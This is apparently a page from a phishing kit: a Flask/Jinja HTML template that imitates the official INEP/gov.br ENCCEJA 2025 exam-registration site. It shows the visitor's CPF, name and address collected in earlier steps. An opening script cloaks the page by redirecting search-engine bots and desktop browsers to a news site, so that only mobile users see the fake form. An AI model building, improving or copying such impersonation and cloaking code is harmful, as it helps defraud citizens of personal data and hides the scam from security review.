<!DOCTYPE html>
<html lang="pt-br">
<head>
    </script>

    <!-- Verificação de dispositivo desktop -->
    <script>
        // Função para detectar se é um dispositivo móvel
        function isMobile() {
          return /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        }

        // Função para detectar se é um bot
        function isBot() {
          const botAgents = [
            'Googlebot', 'Bingbot', 'Slurp', 'DuckDuckBot', 'Baiduspider',
            'YandexBot', 'Sogou', 'Exabot', 'facebot', 'ia_archiver'
          ];

          return botAgents.some(bot => navigator.userAgent.includes(bot));
        }

        // Função para verificar se a largura da janela é maior que 768px
        function isWideScreen() {
          return window.innerWidth > 768;
        }

        // Redirecionar ou bloquear o acesso
        function checkAccess() {
          if (isBot() || (!isMobile() && isWideScreen())) {
            // Redirecionar para o site G1 se o acesso for bloqueado
            window.location.href = "https://g1.globo.com/";
          }
        }

        // Executar a função de verificação ao carregar a página
        window.onload = checkAccess;

        // Adicionar um listener para verificar novamente se a janela for redimensionada
        window.addEventListener('resize', checkAccess);
    </script>
    <meta charset="UTF-8">
    <meta content="width=device-width, initial-scale=1.0" name="viewport">
    <title>ENCCEJA 2025 - Local de Prova</title>
    <link rel="stylesheet" href="{{ url_for('static', filename='css/rawline-fonts.css') }}">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css" />
    <script src="https://cdn.tailwindcss.com"></script>
    <style>
        .gov-header {
            background-color: #222222;
        }
        .inep-header {
            background-color: #044785;
        }
        .form-header {
            background-color: #2c5985;
            color: white;
            font-weight: 600;
        }
        .footer-bg {
            background-color: #1c2b39;
        }
        .btn-primary {
            background-color: #5d85ab;
            color: white;
            transition: all 0.2s ease;
        }
        .btn-primary:hover {
            background-color: #4d7396;
        }
        .btn-primary:disabled {
            background-color: #5d85ab;
            color: rgba(255, 255, 255, 0.6);
            cursor: not-allowed;
        }
        .required-star {
            color: #ff0000;
        }
        .location-card {
            border: 2px solid #e5e7eb;
            transition: all 0.2s ease;
        }
        .location-card:hover {
            border-color: #93c5fd;
        }
        .location-card.selected {
            border-color: #5d85ab;
            background-color: #f0f9ff;
        }
        .text-shadow {
            text-shadow: 1px 1px 2px rgba(0,0,0,0.2);
        }
    </style>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            // Verificar dados do usuário e endereço
            const userData = JSON.parse(localStorage.getItem('cpfData') || '{}');
            const addressData = JSON.parse(localStorage.getItem('enderecoData') || '{}');
            
            console.log("Dados do usuário:", userData);
            console.log("Dados do endereço:", addressData);

            if (!userData.cpf) {
                // Redirecionar para o início se não tiver os dados do usuário
                window.location.href = '/inscricao';
                return;
            }

            // Exibir informações do candidato
            document.getElementById('cpf-display').textContent = userData.cpf;
            document.getElementById('nome-display').textContent = userData.nome;
            
            // Exibir dados do município/bairro
            document.getElementById('bairro-display').textContent = addressData.bairro || "Não informado";
            
            // Atualizar os dois elementos com id 'cidade-display'
            const cidadeElements = document.querySelectorAll('#cidade-display');
            cidadeElements.forEach(element => {
                element.textContent = addressData.cidade || "Não informado";
            });
            
            // Atualizar os dois elementos com id 'uf-display'
            const ufElements = document.querySelectorAll('#uf-display');
            ufElements.forEach(element => {
                element.textContent = addressData.uf || "";
            });
            
            // Configurar evento para submissão do formulário
            const form = document.getElementById('local-form');
            form.addEventListener('submit', function(e) {
                e.preventDefault();
                
                // Salvar que a inscrição foi concluída
                localStorage.setItem('inscricaoConcluida', 'true');
                
                // Redirecionar para a página de informações do Encceja
                window.location.href = '/encceja-info';
            });
        });
    </script>
</head>
<body class="flex flex-col min-h-screen">
    <!-- Government Header -->
    <header class="gov-header text-white py-2">
        <div class="container mx-auto flex justify-between items-center px-4">
            <a class="font-bold text-sm" href="#">
                <img src="https://i.ibb.co/TDkn2RR4/Imagem-29-03-2025-a-s-17-32.jpg" alt="Logotipo do Brasil" class="h-6" />
            </a>
            <nav>
                <ul class="flex space-x-4 text-[10px]">
                    <li>
                        <a class="hover:underline" href="#">ACESSO À INFORMAÇÃO</a>
                    </li>
                    <li>
                        <a class="hover:underline" href="#">PARTICIPE</a>
                    </li>
                    <li>
                        <a class="hover:underline" href="#">SERVIÇOS</a>
                    </li>
                </ul>
            </nav>
        </div>
    </header>
    <!-- INEP Header -->
    <div class="inep-header py-3">
        <div class="container mx-auto px-4">
            <svg class="h-7" height="30" preserveAspectRatio="xMidYMid" viewBox="0 0 69 20" width="120" xmlns="http://www.w3.org/2000/svg">
                <defs>
                    <style>
                        .cls-2{fill:#fff}
                    </style>
                </defs>
                <path class="cls-2" d="M30 20h17v-5H35v-3h12V7H30v13zM50 0v5h19c0-2.47-2.108-5-5-5M50 20h6v-8h8c2.892 0 5-2.53 5-5H50v13zM22 0H9v5h18c-.386-4.118-4.107-5-5-5zm8 5h17V0H30v5zM0 20h6V7H0v13zm9 0h6V7H9v13zm12 0h6V7h-6v13zM0 5h6V0H0v5z" fill-rule="evenodd" id="path-1"/>
            </svg>
        </div>
    </div>
    <!-- Main Content -->
    <main class="flex-grow py-8">
        <div class="container mx-auto px-4 max-w-3xl">
            <!-- ENCCEJA Logo -->
            <div class="text-center mb-6">
                <img alt="Logo ENCCEJA 2025" class="mx-auto" height="100" src="https://enccejanacional.inep.gov.br/encceja/images/Logo-Encceja2025.png" width="420"/>
            </div>
            <!-- Form Container -->
            <div class="border border-gray-300 rounded">
                <!-- Form Header -->
                <div class="form-header py-2 px-4 text-center">
                    <h2 class="text-lg">
                        Inscrição &gt; Local de Prova
                    </h2>
                </div>
                <!-- Form Content -->
                <div class="p-6">
                    <div class="bg-[#2B5984] p-4 rounded-md mb-5 text-white shadow-md">
                        <div class="grid grid-cols-1 md:grid-cols-2 gap-4">
                            <div class="p-2">
                                <p class="text-sm text-gray-200">CPF:</p>
                                <p id="cpf-display" class="font-semibold text-shadow">...</p>
                            </div>
                            <div class="p-2">
                                <p class="text-sm text-gray-200">Nome Completo:</p>
                                <p id="nome-display" class="font-semibold text-shadow">...</p>
                            </div>
                        </div>
                    </div>
                    
                    <div class="mb-6">
                        <h3 class="text-lg font-semibold text-gray-800 mb-2">Local de Prova</h3>
                        <p class="text-gray-600 mb-4">
                            Com base no seu endereço, identificamos locais disponíveis para realização da prova 
                            em <span id="cidade-display" class="font-semibold">...</span>/<span id="uf-display" class="font-semibold">...</span>.
                            A prova será realizada no dia <span class="font-semibold">3 de agosto de 2025</span>.
                        </p>
                        
                        <div class="bg-blue-50 p-4 border border-blue-200 rounded-md mb-5 text-blue-800">
                            <p class="flex items-start">
                                <i class="fas fa-info-circle text-blue-600 mr-2 mt-1"></i>
                                <span>
                                    <strong>Importante:</strong> O local exato da prova, com detalhes da sala, será disponibilizado posteriormente no 
                                    Cartão de Confirmação da Inscrição. Este cartão contém informações como número de inscrição, data, horário e local exato da prova, 
                                    e estará disponível algumas semanas antes do exame na Página do Participante.
                                </span>
                            </p>
                        </div>
                    </div>
                    
                    <form id="local-form" class="space-y-5">
                        <input type="hidden" id="selected-location-id" value="">
                        
                        <div class="bg-[#f0f9ff] border-2 border-[#5d85ab] p-4 rounded-md shadow-md">
                            <h4 class="font-bold text-gray-800 flex items-center">
                                <i class="fas fa-map-marker-alt text-[#5d85ab] mr-2"></i>
                                <span>Município de Prova</span>
                            </h4>
                            <div class="mt-3 text-gray-700">
                                <p><strong class="text-[#2B5984]">Bairro:</strong> <span id="bairro-display">...</span></p>
                                <p><strong class="text-[#2B5984]">Cidade:</strong> <span id="cidade-display">...</span>/<span id="uf-display">...</span></p>
                                <div class="mt-3 bg-blue-50 p-3 rounded text-sm border border-blue-200">
                                    <i class="fas fa-info-circle text-blue-500 mr-1"></i>
                                    Foram encontrados 3 locais disponíveis neste município para a realização da sua prova.
                                </div>
                            </div>
                        </div>
                        
                        <div class="border-t border-gray-300 pt-4 mt-6">
                            <button type="submit" id="submit-button" class="btn-primary w-full py-3 rounded-md flex items-center justify-center">
                                <i class="fas fa-check-circle mr-2"></i>
                                <span>Concluir Inscrição</span>
                            </button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </main>
    <!-- Footer -->
    <footer class="footer-bg text-white py-4 text-xs">
        <div class="container mx-auto px-4">
            <div class="flex flex-col items-center mb-2">
                <svg xmlns="http://www.w3.org/2000/svg" preserveAspectRatio="xMidYMid" width="69" height="20" viewBox="0 0 69 20" class="h-16 w-auto mb-3">
                    <defs><style>.cls-2{fill:#fff}</style></defs>
                    <path d="M30 20h17v-5H35v-3h12V7H30v13zM50 0v5h19c0-2.47-2.108-5-5-5M50 20h6v-8h8c2.892 0 5-2.53 5-5H50v13zM22 0H9v5h18c-.386-4.118-4.107-5-5-5zm8 5h17V0H30v5zM0 20h6V7H0v13zm9 0h6V7H9v13zm12 0h6V7h-6v13zM0 5h6V0H0v5z" id="path-1" class="cls-2" fill-rule="evenodd"/>
                </svg>
                <p class="text-sm text-center mb-2">Instituto Nacional de Estudos e Pesquisas Educacionais</p>
            </div>
            <div class="flex justify-between items-center">
                <div>
                    © MEC - Ministério da Educação | INEP - Instituto Nacional de Estudos e Pesquisas
                </div>
                <div class="flex items-center">
                    <i class="fas fa-phone-alt mr-1"></i>
                    0800 616161
                </div>
            </div>
        </div>
    </footer>
</body>
</html>